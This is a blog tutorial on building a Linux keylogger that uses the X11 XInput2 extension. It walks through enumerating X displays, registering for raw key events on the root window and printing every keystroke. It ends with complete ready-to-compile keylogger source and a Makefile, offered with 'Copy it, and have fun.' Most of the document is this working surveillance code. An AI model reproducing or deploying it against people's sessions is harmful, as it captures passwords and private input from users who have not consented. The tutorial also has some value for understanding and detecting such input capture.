
Keylogging in Linux (X11 Version)

In the previous post, we covered how a keylogger can be written for Linux by reading events directly from the keyboard device. Today, we will cover a slightly different technique for capturing keyboard events.

Linux GUI Stack

Unlike in other OSes such as Windows, the GUI is not part of the Linux OS itself. Instead, it is managed by a stack of different applications, libraries and protocols. A generic stack looks something like this:

Here, the X server sits between the GUI and the OS, and is responsible for providing various primitives. It implements the “windows, icons, menus, pointer” paradigm, which is the bread and butter of a GUI system. The protocol understood by the X server is network oriented (which means you can draw the screen on a completely different system from the one on which the application is running) and is extensible by design. GUI toolkits like GTK and Qt use X client libraries such as Xlib or XCB (these wrap the protocol behind “user friendly” functions) to draw the controls they provide. Applications then use these toolkits to design their own UIs. Generally, these applications run on some desktop environment, which implements “traditional” desktop elements (launcher, wallpaper etc.) and controls (e.g. drag and drop).

X Server Terminology

Since the X server uses non-intuitive terminology, let us go through some of its terms before proceeding further:

display: A “display” is just an X server somewhere.

screen: A “screen” is a virtual framebuffer associated with a “display”. A display may have more than one screen.

monitor: This is the physical monitor on which the framebuffer is drawn. Generally, a screen is mapped to one monitor, but that is not universally true. It is possible to have two monitors showing the same screen, as in a mirrored display, or to use two smaller monitors with one huge screen (where different parts of the screen land on different monitors).

root window: This is the window in which everything else is drawn. It is the root node of the window tree, and each screen has its own root window.

virtual core device: The X server always has two virtual core devices: a mouse and a keyboard. These devices do not depend on the presence of a physical input device and do not generate any events of their own. They are also called master devices. They are designed to provide core events in a range that matches the display resolution. At the same time, they also generate events in the device-specific resolution (if applicable). Clients that register for XInput Extension events receive events in this native resolution. Physical devices are called “slave devices”; clients that open them directly and register for events do not receive core events, because a slave device cannot generate core events.
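To make the difference between a “display” and a “screen” concrete, here is a small sketch that splits a display name of the usual form host:display.screen into its parts. The DisplayName struct and the ParseDisplayName function are hypothetical helpers written for this post, not part of Xlib, and the parser is deliberately simplified (it does not handle IPv6 or other exotic host syntaxes).

```cpp
#include <cctype>
#include <cstddef>
#include <optional>
#include <string>

// Hypothetical helper type, not part of Xlib.
struct DisplayName {
    std::string host;   // empty means the local machine
    int display = 0;    // which X server on that host
    int screen = 0;     // which screen of that server (0 if omitted)
};

// Parses strings such as ":0", ":1.0" or "remote:10.1".
// Returns std::nullopt if the string does not follow that shape.
std::optional<DisplayName> ParseDisplayName(const std::string &name)
{
    const std::size_t colon = name.rfind(':');
    if (colon == std::string::npos) return std::nullopt;

    DisplayName out;
    out.host = name.substr(0, colon);

    // Reads up to 6 decimal digits starting at pos; fails if there are none.
    auto readNumber = [&name](std::size_t &pos, int &value) {
        const std::size_t start = pos;
        value = 0;
        while (pos < name.size() && pos - start < 6 &&
               std::isdigit(static_cast<unsigned char>(name[pos])))
            value = value * 10 + (name[pos++] - '0');
        return pos > start;
    };

    std::size_t pos = colon + 1;
    if (!readNumber(pos, out.display)) return std::nullopt;
    if (pos < name.size()) {
        // Anything after the display number must be ".<screen>"
        if (name[pos++] != '.') return std::nullopt;
        if (!readNumber(pos, out.screen)) return std::nullopt;
    }
    if (pos != name.size()) return std::nullopt;
    return out;
}
```

With this, ":0" means display 0 on the local machine with the default screen, while "remote:10.1" means screen 1 of display 10 on the host named remote.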

Keylogging in X Server

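Input capture boils down to four steps: enumerate the available displays, check that the XInput extension is present, register for the key events we are interested in, and read those events in a loop. Each step is covered below.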

Enumerating displays

By convention, a running X server creates a socket file in /tmp/.X11-unix/ for each display. The file names follow the common pattern X<digits>, where :<digits> is the display name. We can enumerate this directory and try to open each candidate display to confirm that the socket files really belong to an X server.

The sample code for enumeration is as below:

std::vector<std::string> EnumerateDisplay()
{
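    std::vector<std::string> displays;

    // Use the non-throwing overload: if the directory is missing (no X server),
    // the loop body simply never runs instead of aborting with an exception.
    std::error_code ec;
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix", ec))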
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);

            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}

As you can see, we are enumerating screens and their dimensions for each detected display. If you run this, you will see output similar to:

Display :0 has 1 screens
 0: 1920x1080

Here, I have only one screen associated with the display, with dimensions of 1920x1080.
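The prefix check in EnumerateDisplay accepts any file name that starts with X and relies on XOpenDisplay failing for anything bogus. If you would rather filter the names before connecting, a stricter check could look like the sketch below. DisplayFromSocketName is a hypothetical helper of mine, and it assumes the X<digits> naming convention described above.

```cpp
#include <algorithm>
#include <cctype>
#include <optional>
#include <string>

// Hypothetical helper: maps a socket file name such as "X0" to the display
// name ":0", and rejects anything that is not 'X' followed only by digits.
std::optional<std::string> DisplayFromSocketName(const std::string &filename)
{
    // Need the 'X' prefix plus at least one digit
    if (filename.size() < 2 || filename[0] != 'X') return std::nullopt;

    const bool allDigits = std::all_of(filename.begin() + 1, filename.end(),
        [](unsigned char c) { return std::isdigit(c) != 0; });
    if (!allDigits) return std::nullopt;

    return ":" + filename.substr(1);
}
```

Inside the enumeration loop, this would replace the manual erase and append calls; entries for which it returns an empty optional are simply skipped.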

Detecting XInputExtension

We can use XQueryExtension to check whether a given extension is available on the selected display. Since extensions may change their behaviour in future versions, it is a good idea to request the specific version against which we have tested our code. In this example, we will stick to version 2.0 of XInputExtension.

The code snippet for the above is as below:

// Set up X
Display * disp = XOpenDisplay(hostname);
if (NULL == disp)
{
    std::cerr << "Cannot open X display: " << hostname << std::endl;
    exit(1);
}

// Test for XInput 2 extension
int xiOpcode, queryEvent, queryError;
if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
{
    std::cerr << "X Input extension not available" << std::endl;
    exit(2);
}
// Request XInput 2.0, guarding against changes in future versions
int major = 2, minor = 0;
int queryResult = XIQueryVersion(disp, &major, &minor);
if (queryResult == BadRequest) 
{
    std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
    exit(3);
}
else if (queryResult != Success) 
{
    std::cerr << "Internal error" << std::endl;
    exit(4);
}

Registering for events

To get specific events from the X server, we have to tell it which events we are interested in by setting a mask. The mask structure is defined as below:

typedef struct {
    int deviceid;
    int mask_len;
    unsigned char* mask;
} XIEventMask;

If deviceid is a valid device, the event mask is selected only for this device. If deviceid is XIAllDevices or XIAllMasterDevices, the event mask is selected for all devices or all master devices, respectively. The effective event mask is the bit-wise OR of the XIAllDevices, XIAllMasterDevices and the respective device’s event mask.

The mask_len specifies the length of mask in bytes.

Mask is a binary mask in the form of (1 << event type).

The mask can be set as below:

Window root = DefaultRootWindow(disp);

XIEventMask m;
m.deviceid = XIAllMasterDevices;
m.mask_len = XIMaskLen(XI_LASTEVENT);
m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
XISetMask(m.mask, XI_RawKeyPress);
XISetMask(m.mask, XI_RawKeyRelease);

XISelectEvents(disp, root, &m, 1);
XSync(disp, false);
free(m.mask);
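To see what XIMaskLen and XISetMask actually do to the byte array, here is a small stand-alone sketch that mirrors their bit arithmetic without needing the X headers. The event numbers 13 and 14 are what I understand XI2.h to define for XI_RawKeyPress and XI_RawKeyRelease; treat them as an assumption and use the real constants in actual code. The function names MaskLen, SetMask, MaskIsSet and RawKeyMask are my own.

```cpp
#include <cstddef>
#include <vector>

// Assumed values of XI_RawKeyPress / XI_RawKeyRelease from XI2.h.
constexpr int kRawKeyPress = 13;
constexpr int kRawKeyRelease = 14;

// Same arithmetic as XIMaskLen: number of bytes needed to hold bits 0..event.
constexpr std::size_t MaskLen(int event)
{
    return static_cast<std::size_t>((event >> 3) + 1);
}

// Same arithmetic as XISetMask: set bit number `event` in the byte array.
void SetMask(std::vector<unsigned char> &mask, int event)
{
    mask[event >> 3] |= static_cast<unsigned char>(1 << (event & 7));
}

// Same arithmetic as XIMaskIsSet: test bit number `event`.
bool MaskIsSet(const std::vector<unsigned char> &mask, int event)
{
    return (mask[event >> 3] & (1 << (event & 7))) != 0;
}

// Builds the mask used in this post: raw key press and raw key release.
// lastEvent plays the role of XI_LASTEVENT and must be >= kRawKeyRelease.
std::vector<unsigned char> RawKeyMask(int lastEvent)
{
    std::vector<unsigned char> mask(MaskLen(lastEvent), 0);
    SetMask(mask, kRawKeyPress);
    SetMask(mask, kRawKeyRelease);
    return mask;
}
```

Each event type gets one bit: event 13 lands in bit 5 of byte 1 and event 14 in bit 6 of the same byte, so with these assumed numbers the second byte of the mask ends up as 0x60 and the first byte stays zero.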

Reading Events

The event data comes in an object of type XGenericEventCookie, which is defined as below:

typedef struct {
    int type;
    unsigned long serial;
    Bool send_event;
    Display *display;
    int extension;
    int evtype;
    unsigned int cookie;
    void *data;
} XGenericEventCookie; 

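For keyboard events, type will be GenericEvent, extension will be xiOpcode, evtype will be XI_RawKeyRelease or XI_RawKeyPress, and data will point to an XIRawEvent object.

To read the events, we repeat the following in a loop: block in XNextEvent until an event arrives, fetch its payload with XGetEventData, check that it is a raw key event coming from the XInput extension, then translate the key code into a key name and print it. The code for the loop is as below: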

while (true) 
{
    XEvent event;
    XGenericEventCookie *cookie = &event.xcookie;
    XNextEvent(disp, &event);

    // Only generic events carry extra data; skip everything else
    if (!XGetEventData(disp, cookie)) continue;

    if (cookie->type == GenericEvent &&
            cookie->extension == xiOpcode &&
            (cookie->evtype == XI_RawKeyPress || cookie->evtype == XI_RawKeyRelease))
    {
        XIRawEvent *ev = (XIRawEvent*)cookie->data;

        // Ask X what it calls that key
        KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
        char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);

        if (NULL != str)
            std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
    }

    // Release the data fetched by XGetEventData, otherwise every event leaks
    XFreeEventData(disp, cookie);
}

If you compare this code with the keylogger code in the previous blog post, you will see that we don’t have to map scan codes to actual keys on the keyboard manually. We let the X server do the heavy lifting of dealing with the applicable keyboard layout and mapping each key code to the right key on it (something we did not bother handling in the previous post, because it is a headache). Note that because we pass 0 for both the group and the level, XkbKeycodeToKeysym always returns the unshifted symbol from the first configured layout.

Complete Code

For the sake of completeness, I am putting the whole code here for you. Copy it, and have fun.

keylogger.cpp

#include <X11/XKBlib.h>
#include <X11/extensions/XInput2.h>

#include <cstdio>
#include <cstdlib>
#include <cstring>

#include <filesystem>
#include <iostream>
#include <string>
#include <vector>

int printUsage(std::string application_name) 
{
    std::cout << "USAGE: " << application_name << " [-display <display>] [-enumerate] [-help]" << std::endl;
    std::cout << "display      target X display                   (default :0)" << std::endl;
    std::cout << "enumerate    enumerate all X11 displays" << std::endl;
    std::cout << "help         print this information and exit" << std::endl;

    exit(0);
}

std::vector<std::string> EnumerateDisplay()
{
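    std::vector<std::string> displays;

    // Use the non-throwing overload: if the directory is missing (no X server),
    // the loop body simply never runs instead of aborting with an exception.
    std::error_code ec;
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix", ec))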
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        if (path[0] != 'X') continue;
        
        path.erase(0, 1);
        display_name.append(path);
        
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);

            int i;
            for (i=0; i<count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}

int main(int argc, char * argv[])
{
    const char * hostname    = ":0";

    // Get arguments
    for (int i = 1; i < argc; i++)
    {
        if      (!strcmp(argv[i], "-help"))
            printUsage(argv[0]);
        else if (!strcmp(argv[i], "-display") && i + 1 < argc)  
            hostname    = argv[++i];   // only consumed when a value follows
        else if (!strcmp(argv[i], "-enumerate"))
        {
            EnumerateDisplay();
            return 0;
        }
        else
        { 
            std::cerr << "Unknown argument: " << argv[i] << std::endl;
            printUsage(argv[0]); 
        }
    }

    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp)
    {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }

    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
    {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    { // Request XInput 2.0, guarding against changes in future versions
        int major = 2, minor = 0;
        int queryResult = XIQueryVersion(disp, &major, &minor);
        if (queryResult == BadRequest) 
        {
            std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
            exit(3);
        }
        else if (queryResult != Success) 
        {
            std::cerr << "Internal error" << std::endl;
            exit(4);
        }
    }

    // Register events
    Window root = DefaultRootWindow(disp);
    
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);

    while (true) 
    {
        XEvent event;
        XGenericEventCookie *cookie = &event.xcookie;
        XNextEvent(disp, &event);

        // Only generic events carry extra data; skip everything else
        if (!XGetEventData(disp, cookie)) continue;

        if (cookie->type == GenericEvent &&
                cookie->extension == xiOpcode &&
                (cookie->evtype == XI_RawKeyPress || cookie->evtype == XI_RawKeyRelease))
        {
            XIRawEvent *ev = (XIRawEvent*)cookie->data;

            // Ask X what it calls that key
            KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
            char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);

            if (NULL != str)
                std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
        }

        // Release the data fetched by XGetEventData, otherwise every event leaks
        XFreeEventData(disp, cookie);
    }
}

Makefile

keylogger: keylogger.cpp
	$(CXX) -std=c++17 -pedantic -Wall -O0 -ggdb -o keylogger keylogger.cpp -lX11 -lXi
clean:
	rm --force keylogger

Have fun.